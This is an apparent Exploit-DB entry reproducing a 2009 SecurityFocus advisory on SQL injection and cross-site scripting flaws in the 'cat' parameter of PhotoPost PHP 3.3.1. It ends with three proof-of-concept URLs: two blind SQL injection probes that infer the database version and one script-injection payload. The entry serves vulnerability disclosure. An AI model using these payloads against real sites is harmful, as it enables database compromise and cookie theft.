PhotoPost PHP 3.3.1 - 'cat' Cross-Site Scripting / SQL Injection

EDB-ID:

33152

CVE:

N/A


Platform:

PHP

Published:

2009-08-07

source: http://www.securityfocus.com/bid/35996/info

PhotoPost PHP is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PhotoPost PHP 3.3.1 is vulnerable; other versions may also be affected. 

http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False
http://www.example.com/showgallery.php?cat=&#039;"><script>alert(&#039;xss&#039;)</script>